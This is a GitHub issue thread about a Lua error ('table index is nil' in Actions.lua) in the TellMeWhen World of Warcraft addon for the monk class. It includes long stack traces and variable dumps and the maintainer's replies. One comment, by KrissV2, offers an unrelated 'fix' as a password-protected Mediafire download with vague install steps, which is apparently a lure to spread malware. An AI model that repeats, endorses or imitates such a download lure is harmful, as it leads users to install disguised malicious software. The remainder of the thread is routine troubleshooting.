### ISSUE TITLE
TMW not working for monk class

### ISSUE THREAD

**Issue by Drakerus1985** [ascott18/TellMeWhen#2208] opened 2024-08-31 05:42 UTC
### WoW Version

Retail

### TellMeWhen Version

11.0.5

### Describe the bug

This error comes up and will not go away and tmw will not show up and class icons 

Message: ...AddOns/TellMeWhen/Components/Core/Common/Actions.lua:43: table index is nil
Time: Sat Aug 31 06:41:28 2024
Count: 1
Stack: ...AddOns/TellMeWhen/Components/Core/Common/Actions.lua:43: table index is nil
[string "@Interface/AddOns/TellMeWhen/TellMeWhen.lua"]:2769: in function `UpdateNormally'
[string "@Interface/AddOns/TellMeWhen/TellMeWhen.lua"]:2929: in function `Update'
[string "@Interface/AddOns/TellMeWhen/TellMeWhen.lua"]:3071: in function `LockToggle'
[string "*TellMeWhen_Options.xml:1467_OnClick"]:1: in function <[string "*TellMeWhen_Options.xml:1467_OnClick"]:1>

Locals: self = TMW {
 CovenantIcons = <table> {
 }
 modules = <table> {
 }
 DS = <table> {
 }
 db = <table> {
 }
 operators = <table> {
 }
 isNumber = <table> {
 }
 COMMON = <table> {
 }
 TEXT = <table> {
 }
 EquivFullIDLookup = <table> {
 }
 InitializedDatabase = true
 name = "TellMeWhen"
 Defaults = <table> {
 }
 C = <table> {
 }
 BackupDate = "06:40:53 AM"
 SNIPPETS = <table> {
 }
 L = <table> {
 }
 OrderedTypes = <table> {
 }
 justifyVPoints = <table> {
 }
 Views = <table> {
 }
 CHANGELOG = "## v11.0.5
* Spell Cooldown and Reactive Ability icons are vastly more efficient if the tracked ability is on your action bars (macros excluded).
  * This is done by utilizing new WoW 11.0 APIs that are specific to abilities present on action bars.
* Fix: #2197 upstream issue in LibSpellRange-1.0 with range checking in classic/cata.
* Fix: #2201 Don't treat inactive hero talent trees as learned talents

## v11.0.4
* Fix: #2186 Activation overlays in Retail
* The cooldown charge sweep is now skinned with Masque.

## v11.0.3
* Fix activation overlays in Classic
* Fix the Tracking ACtive condition (again)

## v11.0.2
* Support Masque round spell activation overlays. 
  * Must be enabled in Masque -> General Settings -> Advanced -> Spell Alert Style (pick anything other than "None").
* Fix: #2178 Spell dragging to icons broken (again) in WoW 11.0
* Fix: #2179 Tracking Active condition broken in WoW 11.0
* Fix: #2182 Unlearned choice node talents missing from suggestion list
* Fix: #2181 Totem trac defaultModuleState = true
 CHANGELOG_LASTVER = "10.0.0"
 HELP = <table> {
 }
 UPD_INTV = 0.051000
 Locked = true
 NAMES = <table> {
 }
 GUIDToOwner = <table> {
 }
 justifyPoints = <table> {
 }
 CompareFuncs = <table> {
 }
 GCD = 0
 EventList = <table> {
 }
 EVENTS = <table> {
 }
 EquivOriginalLookup = <table> {
 }
 CONST = <table> {
 }
 indentLib = <table> {
 }
 GroupsToUpdate = <table> {
 }
 GCDSpell = 53
 Classes = <table> {
 }
 isRetail = true
 Group_Defaults = <table> {
 }
 SpellTexturesMetaIndex = <table> {
 }
 Warned = true
 performedEvent = "TMW_UPGRADE_PERFORMED"
 UNITS = <table> {
 }
 isWrath = false
 profile = <table> {
 }
 DOGTAG = <table> {
 }
 IconStateArbitrator = <table> {
 }
 time = 1200605.214000
 IconEventUpdateEngine = Frame {
 }
 isCata = false
 baseName = "TellMeWhen"
 TIMERS = <table> {
 }
 Backupdb = <table> {
 }
 SUG = <table> {
 }
 strlowerCache = <table> {
 }
 isClassic = false
 DD = <table> {
 }
 DROPDOWNMENU = <table> {
 }
 CNDT = <table> {
 }
 enabledState = true
 points = <table> {
 }
 IE = TellMeWhen_IconEditor {
 }
 CI = <table> {
 }
 DEFAULT_ICON_SETTINGS = <table> {
 }
 spellTextureCache = <table> {
 }
 Initialized = true
 EquivFirstIDLookup = <table> {
 }
 EquivFullNameLookup = <table> {
 }
 defaultModuleLibraries = <table> {
 }
 BE = <table> {
 }
 IconsToUpdate = <table> {
 }
 PreviousGUIDToOwner = <table> {
 }
 COUNTERS = <table> {
 }
 ValidityCheckQueue = <table> {
 }
 orderedModules = <table> {
 }
 IconDragger = <table> {
 }
 Icon_Defaults = <table> {
 }
 OrderedViews = <table> {
 }
 Types = <table> {
 }
 global = <table> {
 }
 callbackregistry = <table> {
 }
}
TMW = TMW {
 CovenantIcons = <table> {
 }
 modules = <table> {
 }
 DS = <table> {
 }
 db = <table> {
 }
 operators = <table> {
 }
 isNumber = <table> {
 }
 COMMON = <table> {
 }
 TEXT = <table> {
 }
 EquivFullIDLookup = <table> {
 }
 InitializedDatabase = true
 name = "Tell

### Export Strings

```text
n/a
```

**Comment by ascott18** [comment] 2024-08-31 05:56
Duplicate of https://github.com/ascott18/TellMeWhen/issues/2205

Please try the most recent alpha version and let me know if it resolves the issue

**Comment by Drakerus1985** [comment] 2024-08-31 06:22
Hi there,
Yes I still have the error, its not gone

**Comment by KrissV2** [comment] 2024-08-31 07:33
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ascott18** [comment] 2024-08-31 09:12
Please post the error again so I can see the new line number that it occurs on

**Comment by Alwies** [comment] 2024-09-02 08:45
From the discord, Version 11.0.5-7-gc10dfc7
Discord link: https://discord.com/channels/546941305264275456/546942566680231946/1280085689987371100

`4x TellMeWhen/Components/Core/Common/Actions.lua:43: table index is nil
[string "@TellMeWhen/Components/Core/Common/Actions.lua"]:43: in function <TellMeWhen/Components/Core/Common/Actions.lua:40>
[string "@TellMeWhen/Components/Core/Common/Actions.lua"]:94: in function <TellMeWhen/Components/Core/Common/Actions.lua:49>
[string "@TellMeWhen/Components/Core/Common/Actions.lua"]:109: in function <TellMeWhen/Components/Core/Common/Actions.lua:107>

Locals:
identifier = nil
action = 84
actions = nil
(*temporary) = <table> {
 13262 = <table> {
 }
 whirling dragon punch = <table> {
 }
 123904 = <table> {
 }
 115546 = <table> {
 }
 116705 = <table> {
 }
 storm, earth, and fire = <table> {
 }
 spinning crane kick = <table> {
 }
 101545 = <table> {
 }
 117952 = <table> {
 }
 soothing mist = <table> {
 }
 119381 = <table> {
 }
 fortifying brew = <table> {
 }
 fists of fury = <table> {
 }
 rising sun kick = <table> {
 }
 322109 = <table> {
 }
 resuscitate = <table> {
 }
 100784 = <table> {
 }
 vivify = <table> {
 }
 115175 = <table> {
 }
 382501 = <table> {
 }
 122470 = <table> {
 }
 spear hand strike = <table> {
 }
 152175 = <table> {
 }
 provoke = <table> {
 }
 arcane torrent = <table> {
 }
 126892 = <table> {
 }
 mechanism bypass = <table> {
 }
 101643 = <table> {
 }
 392983 = <table> {
 }
 ring of peace = <table> {
 }
 diffuse magic = <table> {
 }
 115288 = <table> {
 }
 116844 = <table> {
 }
 strike of the windlord = <table> {
 }
 388193 = <table> {
 }
 tiger palm = <table> {
 }
 116670 = <table> {
 }
 zen pilgrimage = <table> {
 }
 119996 = <table> {
 }
 115178 = <table> {
 }
 flying serpent kick = <table> {
 }
 invoke xuen, the white tiger = <table> {
 }
 137639 = <table> {
 }
 100780 = <table> {
 }
 122783 = <table> {
 }
 115203 = <table> {
 }
 152173 = <table> {
 }
 disenchant = <table> {
 }
 roll = <table> {
 }
 transcendence = <table> {
 }
 blackout kick = <table> {
 }
 116095 = <table> {
 }
 107428 = <table> {
 }
 disable = <table> {
 }
 leg sweep = <table> {
 }
 energizing elixir = <table> {
 }
 101546 = <table> {
 }
 129597 = <table> {
 }
 113656 = <table> {
 }
 touch of death = <table> {
 }
 crackling jade lightning = <table> {
 }
 109132 = <table> {
 }
 touch of karma = <table> {
 }
 jadefire stomp = <table> {
 }
 transcendence: transfer = <table> {
 }
}
(*temporary) = <table> {
 1 = 84
}
(*temporary) = 84
(*temporary) = "table index is nil"
SpellsToActions = <table> {
 13262 = <table> {
 }
 whirling dragon punch = <table> {
 }
 123904 = <table> {
 }
 115546 = <table> {
 }
 116705 = <table> {
 }
 storm, earth, and fire = <table> {
 }
 spinning crane kick = <table> {
 }
 101545 = <table> {
 }
 117952 = <table> {
 }
 soothing mist = <table> {
 }
 119381 = <table> {
 }
 fortifying brew = <table> {
 }
 fists of fury = <table> {
 }
 rising sun kick = <table> {
 }
 322109 = <table> {
 }
 resuscitate = <table> {
 }
 100784 = <table> {
 }
 vivify = <table> {
 }
 115175 = <table> {
 }
 382501 = <table> {
 }
 122470 = <table> {
 }
 spear hand strike = <table> {
 }
 152175 = <table> {
 }
 provoke = <table> {
 }
 arcane torrent = <table> {
 }
 126892 = <table> {
 }
 mechanism bypass = <table> {
 }
 101643 = <table> {
 }
 392983 = <table> {
 }
 ring of peace = <table> {
 }
 diffuse magic = <table> {
 }
 115288 = <table> {
 }
 116844 = <table> {
 }
 strike of the windlord = <table> {
 }
 388193 = <table> {
 }
 tiger palm = <table> {
 }
 116670 = <table> {
 }
 zen pilgrimage = <table> {
 }
 119996 = <table> {
 }
 115178 = <table> {
 }
 flying serpent kick = <table> {
 }
 invoke xuen, the white tiger = <table> {
 }
 137639 = <table> {
 }
 100780 = <table> {
 }
 122783 = <table> {
 }
 115203 = <table> {
 }
 152173 = <table> {
 }
 disenchant = <table> {
 }
 roll = <table> {
 }
 transcendence = <table> {
 }
 blackout kick = <table> {
 }
 116095 = <table> {
 }
 107428 = <table> {
 }
 disable = <table> {
 }
 leg sweep = <table> {
 }
 energizing elixir = <table> {
 }
 101546 = <table> {
 }
 129597 = <table> {
 }
 113656 = <table> {
 }
 touch of death = <table> {
 }
 crackling jade lightning = <table> {
 }
 109132 = <table> {
 }
 touch of karma = <table> {
 }
 jadefire stomp = <table> {
 }
 transcendence: transfer = <table> {
 }
}
TMW = TMW {
 CovenantIcons = <table> {
 }
 modules = <table> {
 }
 DS = <table> {
 }
 isClassic = false
 db = <table> {
 }
 ALLOW_LOCKDOWN_CONFIG = true
 operators = <table> {
 }
 isNumber = <table> {
 }
 COMMON = <table> {
 }
 TEXT = <table> {
 }
 EquivFullIDLookup = <table> {
 }
 InitializedDatabase = true
 name = "TellMeWhen"
 Defaults = <table> {
 }
 C = <`

**Closed** 2024-09-02 16:14 UTC
Labels: S: more-info-needed
